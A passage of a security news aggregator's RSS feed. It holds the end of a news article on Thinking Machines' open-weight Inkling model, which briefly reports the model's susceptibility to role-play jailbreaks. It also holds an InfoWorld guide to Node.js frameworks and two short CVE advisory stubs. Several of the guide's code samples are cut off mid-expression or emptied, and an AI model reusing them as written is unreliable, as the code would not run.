Sol dominates Terminal Bench 2.1 with an 89.5, easily clearing Inkling's 63.8.</p></li><li><p><b>Native Multimodality:</b> Inkling's native visual and audio capabilities hold their own. On the MMMU Pro (Standard 10) vision benchmark, Inkling's 73.3% is competitive, though trailing Claude Fable 5's 84.2% and GPT 5.6 Sol's 83.0%. In audio processing, Inkling scores a highly respectable 77.2% on MMAU, keeping it within striking distance of Gemini 3.1 Pro's 82.5%.</p></li></ul><p>If an enterprise workflow demands elite software engineering autonomy or the highest bounds of text-only reasoning, models like GLM 5.2 or proprietary systems like Claude Fable 5 maintain the edge. </p><p>However, Inkling carves out a unique and highly defensible position: it is the most capable open-weight foundation model that natively fuses text, vision, and audio, while simultaneously offering developers direct programmatic control over the cost-to-performance ratio. </p><h2><b>The Shift from Static Reasoning to Controllable Thinking</b></h2><p>Rather than attempting to build a singular "god model" optimized strictly for state-of-the-art benchmark domination, Thinking Machines engineered Inkling for adaptability and efficiency in real-world workflows.</p><p>The standout feature of this release is Inkling's "controllable thinking effort." Developers can programmatically adjust the model's reasoning budget—scaling from 0.2 to 0.99—to dictate how hard the AI should "think" before generating an output. </p><p>As the company noted, "Inkling's continuous thinking effort lets you pick your point on the cost/performance curve—reaching the same score with a fraction of the tokens".</p><p>In practical terms, this allows enterprises to deploy Inkling with lower token expenditure for simpler tasks, while cranking up the compute overhead for complex, multi-step reasoning challenges. However, by keeping the thinking effort lower and generating fewer tokens, the cost-conscious enterprise can achieve high quality results and performance on simple tasks while spending less money, or, in the case of those running models locally, less costs on energy and compute resources.</p><p>During the model’s large-scale reinforcement learning (RL) training over 30 million rollouts, researchers observed an emergent phenomenon they called "chain of thought condensation". Over time, Inkling naturally learned to compress its internal reasoning steps—dropping grammatical overhead and connectives—while reaching the same accurate conclusions, resulting in drastically reduced latency.</p><h2><b>Epistemics and Censorship Resistance</b></h2><p>A notable element of Thinking Machines' release is its explicit focus on the model's epistemics—specifically its calibration, instruction following, and resistance to censorship. </p><p>In an ecosystem where open-weight models adopt either overly restrictive safety guardrails or echo state-aligned ideological talking points, Inkling was intentionally trained to answer directly on politically sensitive or heavily censored topics.</p><p>To validate this approach, Thinking Machines submitted Inkling to the <i>Propaganda and Censorship Eval</i> developed by AI startup Cognition. According to the published findings, Inkling demonstrated "strong patterns of censorship non-compliance," effectively resisting ideological capture or boilerplate refusals when presented with sensitive subjects.</p><p>Despite its resistance to censorship, the model maintains a robust defense against genuinely malicious, dangerous, or illegal queries. On the StrongREJECT benchmark—which tests responses to unambiguous harmful requests—Inkling scored 98.6%, placing it in line with strict frontier safety standards. Furthermore, on the FORTRESS benchmark, Inkling successfully navigated the line between safety and over-refusal: it achieved a 78.0% refusal rate on adversarial queries (such as those involving weapons, cyberattacks, or violence) while maintaining a 95.9% compliance rate on benign, look-alike queries.</p><p>Thinking Machines noted that typical open-weight vulnerabilities remain within the architecture. Internal safety evaluations revealed an "occasional tendency to comply with role-play and indirectly framed prompts concerning harmful topics". The company advised enterprise developers to treat the model's built-in refusals as just one layer of security, recommending the downstream deployment of external moderation tools—such as Llama Guard—to filter adversarial jailbreaks and enforce use-case-specific safety policies at the application level.</p><h2><b>Under the Hood: Architecture and Multimodality</b></h2><p>Inkling's scale is staggering, yet sparse. The MoE architecture features 975 billion total parameters, but only 41 billion parameters are active during any given token generation. It supports a massive context window of 1 million tokens and diverges from typical transformer models by using relative positional embeddings instead of the industry-standard Rotary Positional Embedding (RoPE).</p><p>True to the company's foundational vision, Inkling was trained from scratch to be natively multimodal. Unlike models that rely on bolted-on external encoders, Inkling uses an encoder-free early fusion approach. It directly ingests audio as discrete dMel spectrograms and visual data as 40x40 pixel patches via a hierarchical multi-layer perceptron (hMLP), projecting all modalities into a shared hidden space.</p><h2><b>Licensing: True Open-Source for the Enterprise</b></h2><p>For enterprise IT teams and developers, the most disruptive aspect of Inkling may be its licensing. Inkling is released under the permissive Apache 2.0 license.</p><p>In an ecosystem where many so-called "open" models from Western labs are tethered to dual-use commercial licenses, acceptable use restrictions, or revenue caps, an Apache 2.0 designation makes Inkling a true open-source foundation. This gives developers the legal freedom to download, modify, integrate, and commercialize the model weights entirely royalty-free.</p><p>The model is readily deployable across major open-source inference libraries—including SGLang, vLLM, TokenSpeed, and llama.cpp—and comes with a native NVFP4 quantized checkpoint optimized for NVIDIA Blackwell systems.</p><h2><b>Community Reactions: The Engineering Feat</b></h2><p>The AI community's response has been swift, praising both the model's openness and the underlying engineering execution.</p><p>In a<a href="https://x.com/johnschulman2/status/2077460227327467982"> post on X</a>, Thinking Machines co-founder John Schulman reflected on the rapid development cycle: "Inkling is out today, with open weights and in Tinker. It's been fun to watch this one come together: pretraining began last winter, and starting in mid-January a small team built up the coding, reasoning, and agentic training from there. We learned a lot building it, and I hope people find good uses for it."</p><div></div><p>Horace He, a researcher at Thinking Machines (previously from PyTorch), underscored the difficulty of the task in <a href="https://x.com/cHHillee/status/2077457790423969806">another post on X</a>: "It truly takes a village to release a model, perhaps especially an open weights model. Actually doing the entire process from scratch, from data to pretraining to posttraining to actual release, gives a lot of appreciation for anyone who does it!"</p><div></div><p>The broader open-source ecosystem has also embraced the technical integrations. Lysandre Debut, the Chief Open-Source Officer at Hugging Face, shared his enthusiasm regarding the model's optimization<a href="https://x.com/LysandreJik/status/2077459011285512267"> in his own X post</a>: "One thing I find quite striking is how much easier accelerating models has become... We replaced the model's causal Conv1D with the `causal-conv1d` kernel. One line changed, +4% tokens per second. We then replaced its attention implementation with FlashAttention-4. Another single change, another +11%. That's a total throughput improvement of about 15%, without changing the model architecture or retraining anything."</p><p>Tiezhen Wang, an ecosystem growth expert and ex-Googler, celebrated the release as a massive win for the open-source community, listing the model's impressive specifications on X, highlighting its "975B total, 41B active" size, "Native MTP support," and the highly coveted "Apache 2.0 license."</p><h2><b>Background: The Road to Inkling</b></h2><p>To understand the significance of Inkling, one has to look back at the rapid trajectory of Thinking Machines over the past 18 months.</p><p>When<a href="https://venturebeat.com/technology/ex-openai-cto-mira-murati-unveils-thinking-machines-a-startup-focused-on-multimodality-human-ai-collaboration"> Mira Murati departed OpenAI in late 2024 to found Thinking Machines</a> alongside industry veterans like John Schulman and Barret Zoph, the stated goal was to pivot away from building isolated autonomous agents. Instead, the company aimed to build flexible, multimodal systems designed for genuine human-AI collaboration and open science.</p><p>By July 2025, the startup had secured a historic $2 billion seed round led by Andreessen Horowitz at a $12 billion valuation. At the time, Murati promised the<a href="https://venturebeat.com/technology/mira-murati-says-her-startup-thinking-machines-will-release-new-product-in-months-with-significant-open-source-component"> impending release of a product with a "significant open source component" </a>to empower researchers and startups.</p><p>The company’s philosophy began coming into sharper focus in October 2025 with the launch of <a href="https://venturebeat.com/technology/thinking-machines-first-official-product-is-here-meet-tinker-an-api-for">Tinker</a>, a Python-based API for large language model fine-tuning that gave researchers granular control over training pipelines without the friction of distributed compute management.</p><p>That same month, Thinking Machines researcher <a href="https://venturebeat.com/ai/thinking-machines-challenges-openais-ai-scaling-strategy-first">Rafael Rafailov delivered a provocative critique of the AI industry at TED AI</a>. He argued that the current trajectory of simply throwing more compute at models was fundamentally flawed, noting that today's systems take shortcuts—like wrapping code in<code> try/except</code> blocks—because they are trained strictly for task completion rather than genuine learning. </p><p>Rafailov posited that the first artificial superintelligence would not be a "god model," but rather a "superhuman learner" capable of meta-learning and internalizing abstractions. Inkling’s architecture—specifically its controllable thinking effort and its ability to organically compress its chain of thought during RL—feels like the first tangible realization of Rafailov's thesis.</p><p>In May 2026, the lab teased its technical prowess with the<a href="https://venturebeat.com/technology/thinking-machines-shows-off-preview-of-near-realtime-ai-voice-and-video-conversation-with-new-interaction-models"> research preview of TML-Interaction-Small</a>, a system that eliminated "turn-based" chat by processing inputs and outputs simultaneously in 200ms chunks. This "full-duplex" breakthrough proved the company could build highly responsive, natively multimodal models from scratch.</p><p>Now, with Inkling out in the wild, Thinking Machines has delivered on its foundational promises. By offering a massive, natively multimodal model under a true open-source license, they aren't just giving developers a new tool—they are attempting to fundamentally rewrite the economics and accessibility of frontier AI development.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[The complete guide to Node.js frameworks]]></title>
<description><![CDATA[Node.js is one of the most popular server-side platforms, especially for web applications. It gives you non-blocking JavaScript without a browser, plus an enormous ecosystem. That ecosystem is one of Node’s chief strengths, making it a go-to option for server development.



This article is a qui...]]></description>
<link>https://tsecurity.de/de/3665672/ai-nachrichten/the-complete-guide-to-nodejs-frameworks/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3665672/ai-nachrichten/the-complete-guide-to-nodejs-frameworks/</guid>
<pubDate>Mon, 13 Jul 2026 17:04:36 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div><div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph"><a href="https://www.infoworld.com/article/2254485/what-is-nodejs-javascript-runtime-explained.html">Node.js</a> is one of the most popular server-side platforms, especially for web applications. It gives you non-blocking JavaScript without a browser, plus an enormous ecosystem. That ecosystem is one of Node’s chief strengths, making it a go-to option for server development.</p>



<p class="wp-block-paragraph">This article is a quick tour of the most popular web frameworks for <a href="https://www.infoworld.com/article/2257958/nodejs-tutorial-get-started-with-nodejs.html">server development on Node.js</a>. We’ll look at minimalist tools like Express.js, batteries-included frameworks like Nest.js, and full-stack frameworks like Next.js. You’ll get an overview of the frameworks and a taste of what it’s like to write a simple server application in each one.</p>



<h2 class="wp-block-heading">Minimalist web frameworks</h2>



<p class="wp-block-paragraph">When it comes to Node web frameworks, <em>minimalist</em> doesn’t mean limited. Instead, these frameworks provide the essential features required to do the job for which they are intended. The frameworks in this list also tend to be highly extensible, so you can customize them as needed. With minimalist frameworks, pluggable extensibility is the name of the game.</p>



<h3 class="wp-block-heading">Express.js</h3>



<p class="wp-block-paragraph">At over 47 million weekly downloads on npm, Express is one of the most-installed software packages of all time—and for good reason. Express gives you basic web endpoint routing and request-and-response handling inside an extensible framework that is easy to understand. Most other frameworks in this category have adopted the basic style of describing a route from Express. This framework is the obvious choice when you simply need to create some routes for HTTP, and you don’t mind a DIY approach for anything extra.</p>



<p class="wp-block-paragraph">Despite its simplicity, Express is fully-featured when it comes to things like route parameters and request handling. Here is a simple Express endpoint that returns a dog breed based on an ID:</p>



<pre class="wp-block-code"><code>import express from 'express';

const app = express();
const port = 3000;

// In-memory array of dog breeds
const dogBreeds = [
  "Shih Tzu",
  "Great Pyrenees",
  "Tibetan Mastiff",
  "Australian Shepherd"
];
app.get('/dogs/:id', (req, res) =&gt; {
  // Convert the id from a string to an integer
  const id = parseInt(req.params.id, 10);

  // Check if the id is a valid number and within the array bounds
  if (id &gt;= 0 &amp;&amp; id  {
  console.log(`Server running at http://localhost:${port}`);
});</code></pre>



<p class="wp-block-paragraph">You can easily see how the route is defined here: a string representation of a URL, followed by a function that receives a request and response object. The process of creating the server and listening on a port is simple.</p>



<p class="wp-block-paragraph">If you are coming from a framework like Next, the biggest thing you might notice about Express is that it lacks a file-system based router. On the other hand, it offers a huge range of <a href="https://expressjs.com/en/resources/middleware.html">middleware plugins</a> to help with essential functions like security.</p>



<h3 class="wp-block-heading">Koa</h3>



<p class="wp-block-paragraph"><a href="https://koajs.com/">Koa</a> was created by the original creators of Espress, who took the lessons learned from that project and used them for a fresh take on the JavaScript server. Koa’s focus is providing a minimalist core engine. It uses <code>async</code>/<code>await</code> functions for middleware rather than chaining with <code>next()</code> calls. This can give you a cleaner server, especially when there are many plugins. It also makes the error handling less clunky for middleware.</p>



<p class="wp-block-paragraph">Koa also differs from Express by exposing a unified context object instead of separate request and response objects, which makes for a somewhat less cluttered API. Here is how Koa manages the same route we created in Express:</p>



<pre class="wp-block-code"><code>router.get('/dogs/:id', (ctx) =&gt; {
  const id = parseInt(ctx.params.id, 10);

  if (id &gt;= 0 &amp;&amp; id &lt; dogBreeds.length) {
    ctx.status = 200;
    ctx.body = { breed: dogBreeds[id] };
  } else {
    ctx.status = 404;
    ctx.body = { error: 'Dog breed not found' };
  }
});</code></pre>



<p class="wp-block-paragraph">The only real difference is the combined context object.</p>



<p class="wp-block-paragraph">Koa’s middleware mechanism is also worth a look. Here’s a simple logging plugin in Koa:</p>



<pre class="wp-block-code"><code>const logger = async (ctx, next) =&gt; {
  await next(); // This passes control to the router
  console.log(`${ctx.method} ${ctx.url} - ${ctx.status}`);
};

// Use the logger middleware for all requests
app.use(logger);	</code></pre>



<h3 class="wp-block-heading">Fastify</h3>



<p class="wp-block-paragraph"><a href="https://fastify.dev/">Fastify</a> lets you define schemas for your APIs. This is an up-front, formal mechanism for describing what the server supports:</p>



<pre class="wp-block-code"><code>const schema = {
  params: {
    type: 'object',
    properties: {
      id: { type: 'integer' }
    }
  },
  response: {
    200: {
      type: 'object',
      properties: {
        breed: { type: 'string' }
      }
    },
    404: {
      type: 'object',
      properties: {
        error: { type: 'string' }
      }
    }
  }
};

fastify.get('/dogs/:id', { schema }, (request, reply) =&gt; {
  const id = request.params.id;

  if (id &gt;= 0 &amp;&amp; id  {
  if (err) {
    fastify.log.error(err);
    process.exit(1);
  }
  console.log(`Server running at ${address}`);
});</code></pre>



<p class="wp-block-paragraph">From this example, you can see the actual endpoint definition is similar to Express and Koa, but we define a schema for the API. The schema is not strictly necessary; it is possible to define endpoints without it. In that case, Fastify behaves much like Express, but with superior performance.</p>



<h3 class="wp-block-heading">Hono</h3>



<p class="wp-block-paragraph"><a href="https://hono.dev/">Hono</a> emphasizes simplicity. You can define a server and endpoint with as little as:</p>



<pre class="wp-block-code"><code>const app = new Hono()
app.get('/', (c) =&gt; c.text('Hello, Infoworld!'))  </code></pre>



<p class="wp-block-paragraph">And here’s how our dog breed example looks:</p>



<pre class="wp-block-code"><code>app.get('/dogs/:id', (c) =&gt; {
  // Get the id parameter from the request URL
  const id = parseInt(c.req.param('id'), 10);

  // Check if the id is a valid number and within the array bounds
  if (id &gt;= 0 &amp;&amp; id &lt; dogBreeds.length) {
    // Return a JSON response with a 200 OK status (default)
    return c.json({ breed: dogBreeds[id] });
  } else {
    // Set status to 404 and return a JSON error message
    c.status(404);
    return c.json({ error: 'Dog breed not found' });
  }
});</code></pre>



<p class="wp-block-paragraph">As you can see, Hono provides a unified context object, similar to Koa.</p>



<h3 class="wp-block-heading">Nitro.js</h3>



<p class="wp-block-paragraph"><a href="https://www.infoworld.com/article/4061129/intro-to-nitro-the-server-engine-built-for-modern-javascript.html">Nitro</a> is the back end for several full-stack frameworks, including Nuxt.js. As part of the UnJS ecosystem, Nitro goes further than Express in providing cloud-native tooling support. It includes a universal storage adapter and deployment support for serverless and cloud deployment targets.</p>



<p class="wp-block-paragraph"><strong>Also see: <a href="https://www.infoworld.com/article/4061129/intro-to-nitro-the-server-engine-built-for-modern-javascript.html">Intro to Nitro: The server engine built for modern JavaScript</a>.</strong></p>



<p class="wp-block-paragraph">Like Next.js, Nitro uses filesystem-based routing, so our Dog Finder API would exist at the following filepath:</p>



<pre class="wp-block-code"><code>/api/dogs/:id</code></pre>



<p class="wp-block-paragraph">The handler might look like this:</p>



<pre class="wp-block-code"><code>export default defineEventHandler((event) =&gt; {
  // Get the dynamic parameter from the event context
  const { id } = getRouterParams(event);
  const parsedId = parseInt(id, 10);

  // Check if the id is a valid number and within the array bounds
  if (parsedId &gt;= 0 &amp;&amp; parsedId &lt; dogBreeds.length) {
    // Nitro handles JSON serialization
    return { breed: dogBreeds[parsedId] };
  } else {
    setResponseStatus(event, 404);
    return { error: 'Dog breed not found' };
  }
});</code></pre>



<p class="wp-block-paragraph">Nitro inhabits the middle ground between a pure tool like Express and a full-blown stack, which is why full-stack front ends often use Nitro on the back end.</p>



<h2 class="wp-block-heading">Batteries-included frameworks</h2>



<p class="wp-block-paragraph">Although Express and other minimalist frameworks set the standard for simplicity, more opinionated frameworks can be useful if you want additional features out of the box.</p>



<h3 class="wp-block-heading">Nest.js</h3>



<p class="wp-block-paragraph"><a href="https://www.infoworld.com/article/4091407/intro-to-nest-js-server-side-javascript-development-on-node.html">Nest</a> is a progressive framework built with <a href="https://www.infoworld.com/article/2257305/what-is-typescript-strongly-typed-javascript.html">TypeScript</a> from the ground up. Nest is actually a layer on top of Express (or Fastify), with additional services. It is inspired by Angular and incorporates the kind of architectural support found there. In particular, it includes dependency injection. Nest also uses annotated controllers for endpoints.</p>



<p class="wp-block-paragraph"><strong>Also see: <a href="https://www.infoworld.com/article/4091407/intro-to-nest-js-server-side-javascript-development-on-node.html">Intro to Nest.js: Server-side JavaScript development on Node</a>.</strong></p>



<p class="wp-block-paragraph">Here is an example of injecting a dog finder provider into a controller:</p>



<pre class="wp-block-code"><code>// The provider:
import { Injectable, NotFoundException } from '@nestjs/common';

// The @Injectable() decorator marks this class as a provider.
@Injectable()
export class DogsService {
  private readonly dogBreeds = [
    "Shih Tzu",
    "Great Pyrenees",
    "Tibetan Mastiff",
    "Australian Shepherd"
  ];

  findOne(id: number) {
    if (id &gt;= 0 &amp;&amp; id &lt; this.dogBreeds.length) {
      return { breed: this.dogBreeds[id] };
    }
    // NestJS has built-in HTTP exception classes for common errors.
    throw new NotFoundException('Dog breed not found');
  }
}

// The controller

import { Controller, Get, Param, ParseIntPipe } from '@nestjs/common';
import { DogsService } from './dogs.service';

@Controller('dogs')
export class DogsController {
  // NestJS injects the DogsService through the constructor.
  // The 'private readonly' syntax is a TypeScript shorthand
  // to both declare and initialize the dogsService member.
  constructor(private readonly dogsService: DogsService) {}

  @Get(':id')
  findOneDog(@Param('id', ParseIntPipe) id: number) {
    // We can now use the service's methods. The ParseIntPipe
    // automatically converts the string URL parameter to a number.
    return this.dogsService.findOne(id);
  }
}</code></pre>



<p class="wp-block-paragraph">This style is typical of dependency injection frameworks like <a href="https://www.infoworld.com/article/3964105/catching-up-with-angular-19.html" data-type="link" data-id="https://www.infoworld.com/article/3964105/catching-up-with-angular-19.html">Angular</a>, as well as <a href="https://www.infoworld.com/article/4083578/a-fresh-look-at-the-spring-framework.html" data-type="link" data-id="https://www.infoworld.com/article/4083578/a-fresh-look-at-the-spring-framework.html">Spring</a>. It allows you to declare components as injectable, then consume them anywhere you need them.</p>



<p class="wp-block-paragraph">In Nest, we’d just add these as modules to make them live.</p>



<h3 class="wp-block-heading">Adonis.js</h3>



<p class="wp-block-paragraph">Like Nest, <a href="https://adonisjs.com/">Adonis</a> provides a controller layer that you wire together with routes. Adonis is inspired by the model-view-controller (MVC) pattern, so it also includes a layer for modelling data and accessing stores via an ORM. Finally, it provides a validator layer for ensuring data meets requirements.</p>



<p class="wp-block-paragraph">Routes in Adonis are very simple:</p>



<pre class="wp-block-code"><code>Route.get('/dogs/:id', [DogsController, 'show'])</code></pre>



<p class="wp-block-paragraph">In this case, <code>DogsController</code> would be the handler for the route, and might look something like:</p>



<pre class="wp-block-code"><code>import type { HttpContextContract } from '@ioc:Adonis/Core/HttpContext'  // Note, ioc means inversion of control, similar to dependency injection

export default class DogsController {
  // The 'show' method handles the logic for the route
  public async show({ params, response }: HttpContextContract) {
    const id = Number(params.id);

    // Check if the id is a valid number and within the array bounds
    if (!isNaN(id) &amp;&amp; id &gt;= 0 &amp;&amp; id &lt; this.dogBreeds.length) {
      // Use the response object to send a 200 OK JSON response
      return response.ok({ breed: this.dogBreeds[id] });
    } else {
      // Send a 404 Not Found response
      return response.notFound({ error: 'Dog breed not found' });
    }
  }
}</code></pre>



<p class="wp-block-paragraph">Of course, in a real application, we could define a model layer to handle the actual data access.</p>



<h3 class="wp-block-heading">Sails</h3>



<p class="wp-block-paragraph"><a href="https://sailsjs.com/">Sails</a> is another MVC-style framework. It is one of the original one-stop-shopping frameworks for Node and includes an ORM layer (<a href="https://sailsjs.com/documentation/reference/waterline-orm">Waterline</a>), API generation (<a href="https://sailsjs.com/documentation/reference/blueprint-api">Blueprints</a>), and realtime support, including <a href="https://www.infoworld.com/article/3552685/websockets-under-the-hood.html" data-type="link" data-id="https://www.infoworld.com/article/3552685/websockets-under-the-hood.html">WebSockets</a>.</p>



<p class="wp-block-paragraph">Sails strives for conventional operation. For example, here’s how you might define a simple model for dogs:</p>



<pre class="wp-block-code"><code>/**
 * Dog.js
 *
 * @description :: A model definition represents a database table/collection.
 * @docs        :: https://sailsjs.com/docs/concepts/models
 */
module.exports = {
  attributes: {
    breed: { type: 'string', required: true },
  },
};</code></pre>



<p class="wp-block-paragraph">If you run this in Sails, the framework will generate default routes and wire up a <a href="https://www.infoworld.com/article/2265797/how-to-choose-the-right-nosql-database-2.html" data-type="link" data-id="https://www.infoworld.com/article/2265797/how-to-choose-the-right-nosql-database-2.html">NoSQL</a> or SQL datastore based on your configuration. Sails also provides the option to override these defaults and add in your own custom logic.</p>



<h2 class="wp-block-heading">Full-stack frameworks</h2>



<p class="wp-block-paragraph">Also known as <a href="https://www.infoworld.com/article/3486850/state-of-javascript-insights-from-the-latest-javascript-community-survey.html">meta-frameworks</a>, these tools combine a front-end framework with a solid back end and various CLI niceties like build chains.</p>



<h3 class="wp-block-heading">Next.js</h3>



<p class="wp-block-paragraph"><a href="https://www.infoworld.com/article/4078213/next-js-16-features-explicit-caching-ai-powered-debugging.html">Next</a> is a React-based framework built by Vercel. It is largely responsible for the huge growth in popularity of these types of frameworks. Next was the first framework to bring together back-end API definitions with the front end that consumes them. It also introduced file-system routing. In Next and other full-stack frameworks, you get both parts of your stack in one place and you can run them together during development.</p>



<p class="wp-block-paragraph">In Next, we could define a route at <code>pages/api/dogs/[id].js</code> like so:</p>



<pre class="wp-block-code"><code>export default function handler(req, res) {
  // `req.query.id` comes from the dynamic filename [id].js
  const { id } = req.query;
  const parsedId = parseInt(id, 10);

  if (parsedId &gt;= 0 &amp;&amp; parsedId &lt; dogBreeds.length) {
    // If the ID is valid, return the data
    res.status(200).json({ breed: dogBreeds[parsedId] });
  } else {
    // Otherwise, return a 404 error
    res.status(404).json({ error: 'Dog breed not found' });
  }
}</code></pre>



<p class="wp-block-paragraph">We’d then define the UI component to interact with this route at <code>pages/dogs/[id].js</code>:</p>



<pre class="wp-block-code"><code>import React from 'react';

// This is the React component that renders the page.
// It receives the `dog` object as a prop from getServerSideProps.
function DogPage({ dog }) {
  // Handle the case where the dog wasn't found
  if (!dog) {
    return <h1>Dog Breed Not Found</h1>;
  }

  return (
    <div>
      <h1>Dog Breed Profile</h1>
      <p>Breed Name: <strong>{dog.breed}</strong></p>
    </div>
  );
}

// This function runs on the server before the page is sent to the browser.
export async function getServerSideProps(context) {
  const { id } = context.params; // Get the ID from the URL

  // Fetch data from our own API route on the server.
  const res = await fetch(`http://localhost:3000/api/dogs/${id}`);
  
  // If the fetch was successful, parse the JSON.
  const dog = res.ok ? await res.json() : null;

  // Pass the fetched data to the DogPage component as props.
  return {
    props: {
      dog,
    },
  };
}

export default DogPage;</code></pre>



<h3 class="wp-block-heading">Nuxt.js</h3>



<p class="wp-block-paragraph"><a href="https://www.infoworld.com/article/4025936/nuxt-4-0-improves-project-organization-data-fetching-typescript-support.html">Nuxt</a> is the same idea as Next, but applied to the <a href="http://vue.js/">Vue</a> front end. The basic pattern is the same, though. First, we’d define a back-end route:</p>



<pre class="wp-block-code"><code>// server/api/dogs/[id].js

// defineEventHandler is Nuxt's helper for creating API handlers.
export default defineEventHandler((event) =&gt; {
  // Nuxt automatically parses route parameters.
  const id = getRouterParam(event, 'id');
  const parsedId = parseInt(id, 10);

  if (parsedId &gt;= 0 &amp;&amp; parsedId &lt; dogBreeds.length) {
    return { breed: dogBreeds[parsedId] };
  } else {
    // Helper to set the status code and return an error.
    setResponseStatus(event, 404);
    return { error: 'Dog breed not found' };
  }
});</code></pre>



<p class="wp-block-paragraph">Then, we’d create the UI file in Vue:</p>



<pre class="wp-block-code"><code>// pages/dogs/[id].vue


  <div>
    <div>
      Loading...
    </div>
    <div>
      <h1>{{ error.data.error }}</h1>
    </div>
    <div>
      <h1>Dog Breed Profile</h1>
      <p>Breed Name: <strong>{{ dog.breed }}</strong></p>
    </div>
  </div>


</code></pre>



<h3 class="wp-block-heading">SvelteKit</h3>



<p class="wp-block-paragraph"><a href="https://www.infoworld.com/article/2337758/intro-to-sveltekit-10-the-full-stack-framework-for-svelte.html">SvelteKit</a> is the full-stack framework for the Svelte front end. It’s similar to Next and Nuxt, with the main difference being the front-end technology.</p>



<p class="wp-block-paragraph">In SvelteKit, a back-end route looks like so:</p>



<pre class="wp-block-code"><code>// src/routes/api/dogs/[id]/+server.js

import { json, error } from '@sveltejs/kit';

// This is our data source for the example.
const dogBreeds = [
  "Shih Tzu",
  "Australian Cattle Dog",
  "Great Pyrenees",
  "Tibetan Mastiff",
];

/** @type {import('./$types').RequestHandler} */
export function GET({ params }) {
  // The 'id' comes from the [id] directory name.
  const id = parseInt(params.id, 10);

  if (id &gt;= 0 &amp;&amp; id &lt; dogBreeds.length) {
    // The json() helper creates a valid JSON response.
    return json({ breed: dogBreeds[id] });
  }

  // The error() helper is the idiomatic way to return HTTP errors.
  throw error(404, 'Dog breed not found');
}</code></pre>



<p class="wp-block-paragraph">SvelteKit usually splits the UI into two components. The first component is for loading the data (which can then be run on the server):</p>



<pre class="wp-block-code"><code>// src/routes/dogs/[id]/+page.js

import { error } from '@sveltejs/kit';

/** @type {import('./$types').PageLoad} */
export async function load({ params, fetch }) {
  // Use the SvelteKit-provided `fetch` to call our API endpoint.
  const response = await fetch(`/api/dogs/${params.id}`);

  if (response.ok) {
    const dog = await response.json();
    // The object returned here is passed as the 'data' prop to the page.
    return {
      dog: dog
    };
  }

  // If the API returns an error, forward it to the user.
  throw error(response.status, 'Dog breed not found');
}</code></pre>



<p class="wp-block-paragraph">The second component is the UI:</p>



<pre class="wp-block-code"><code>// src/routes/dogs/[id]/+page.svelte



<div>
  <h1>Dog Breed Profile</h1>
  <p>Breed Name: <strong>{data.dog.breed}</strong></p>
</div></code></pre>



<h2 class="wp-block-heading">Conclusion</h2>



<p class="wp-block-paragraph">The Node.js ecosystem has moved beyond the “default-to-Express” days. Now, it is worth your time to look for a framework that fits your specific situation.<br><br>If you are building <a href="https://www.infoworld.com/article/2263327/what-are-microservices-your-next-software-architecture.html">microservices</a> or high-performance APIs, where every millisecond counts, you owe it to yourself to look at minimalist frameworks like Fastify or Hono. This class of frameworks gives you raw speed and total control without requiring decisions about infrastructure.<br><br>If you are building an enterprise monolith or working with a big team, batteries-included frameworks like Nest or Adonis offer useful structure. The complexity of the initial setup buys you long-term maintainability and makes the codebase more standardized for new developers.<br><br>Finally, if your project is a content-rich web application, full-stack meta-frameworks like Next, Nuxt, and SvelteKit offer the best developer experience and the perfect profile of tools.<br><br>It’s also worth noting that, while Node remains the standard server-side runtime, alternatives <a href="https://www.infoworld.com/article/2256205/what-is-deno-a-better-nodejs.html">Deno</a> and <a href="https://www.infoworld.com/article/2338008/explore-bunjs-the-all-in-one-javascript-runtime.html">Bun</a> have both made a name for themselves. Deno has great heritage, is open source with a strong security focus, and has its own framework, <a href="https://www.infoworld.com/article/3523813/intro-to-deno-fresh-a-fresh-take-on-full-stack-javascript.html">Deno Fresh</a>. Bun is respected for its ultra-fast startup and integrated tooling.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2023-31595 | IC Realtime ICIP-P2012T 2.420 Port access control (EUVD-2023-35892)]]></title>
<description><![CDATA[A vulnerability marked as critical has been reported in IC Realtime ICIP-P2012T 2.420. This affects an unknown part of the component Port Handler. This manipulation causes improper access controls.

This vulnerability is handled as CVE-2023-31595. The attack can only be done within the local netw...]]></description>
<link>https://tsecurity.de/de/3657583/sicherheitsluecken/cve-2023-31595-ic-realtime-icip-p2012t-2420-port-access-control-euvd-2023-35892/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3657583/sicherheitsluecken/cve-2023-31595-ic-realtime-icip-p2012t-2420-port-access-control-euvd-2023-35892/</guid>
<pubDate>Thu, 09 Jul 2026 17:51:41 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability marked as <a href="https://vuldb.com/kb/risk">critical</a> has been reported in <a href="https://vuldb.com/product/ic_realtime:icip-p2012t">IC Realtime ICIP-P2012T 2.420</a>. This affects an unknown part of the component <em>Port Handler</em>. This manipulation causes improper access controls.

This vulnerability is handled as <a href="https://vuldb.com/cve/CVE-2023-31595">CVE-2023-31595</a>. The attack can only be done within the local network. There is not any exploit available.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2023-31594 | IC Realtime ICIP-P2012T 2.420 VLC Network access control (EUVD-2023-35891)]]></title>
<description><![CDATA[A vulnerability was found in IC Realtime ICIP-P2012T 2.420. It has been declared as critical. This vulnerability affects unknown code of the component VLC Network Handler. The manipulation results in improper access controls.

This vulnerability is cataloged as CVE-2023-31594. The attack must ori...]]></description>
<link>https://tsecurity.de/de/3657582/sicherheitsluecken/cve-2023-31594-ic-realtime-icip-p2012t-2420-vlc-network-access-control-euvd-2023-35891/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3657582/sicherheitsluecken/cve-2023-31594-ic-realtime-icip-p2012t-2420-vlc-network-access-control-euvd-2023-35891/</guid>
<pubDate>Thu, 09 Jul 2026 17:51:40 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
